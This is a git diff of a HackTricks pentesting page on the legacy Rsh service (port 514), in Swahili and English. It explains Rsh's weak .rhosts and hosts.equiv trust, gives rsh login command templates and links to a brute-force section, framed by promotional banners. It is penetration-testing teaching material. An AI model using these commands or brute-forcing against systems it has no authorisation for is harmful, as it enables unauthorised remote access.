* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

46
network-services-pentesting/pentesting-rsh.md
View file

@ -1,28 +1,29 @@
# 514 - Pentesting Rsh
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Kwa ajili ya uwakiki, faili za **.rhosts** pamoja na **/etc/hosts.equiv** zilitumiwa na **Rsh**. Uwakiki ulitegemea anwani za IP na Mfumo wa Jina la Kikoa (DNS). Urahisi wa kudanganya anwani za IP, hasa kwenye mtandao wa ndani, ulikuwa ni udhaifu mkubwa.
Kwa ajili ya uthibitishaji, **.rhosts** faili pamoja na **/etc/hosts.equiv** zilitumika na **Rsh**. Uthibitishaji ulikuwa unategemea anwani za IP na Mfumo wa Majina ya Kikoa (DNS). Urahisi wa kudanganya anwani za IP, hasa kwenye mtandao wa ndani, ulikuwa udhaifu mkubwa.
Zaidi ya hayo, ilikuwa kawaida faili za **.rhosts** kuwekwa ndani ya saraka za nyumbani za watumiaji, ambazo mara nyingi zilikuwa zimehifadhiwa kwenye sehemu za Network File System (NFS).
Zaidi ya hayo, ilikuwa kawaida kwa **.rhosts** faili kuwekwa ndani ya saraka za nyumbani za watumiaji, ambazo mara nyingi zilikuwa ziko kwenye volumu za Mfumo wa Faili wa Mtandao (NFS).
**Bandari ya chaguo-msingi**: 514
**Port ya kawaida**: 514
## Ingia
## Login
```
rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
@ -31,19 +32,20 @@ rsh domain\\user@<IP> <Command>
```
### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsh)
## Marejeo
## References
* [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}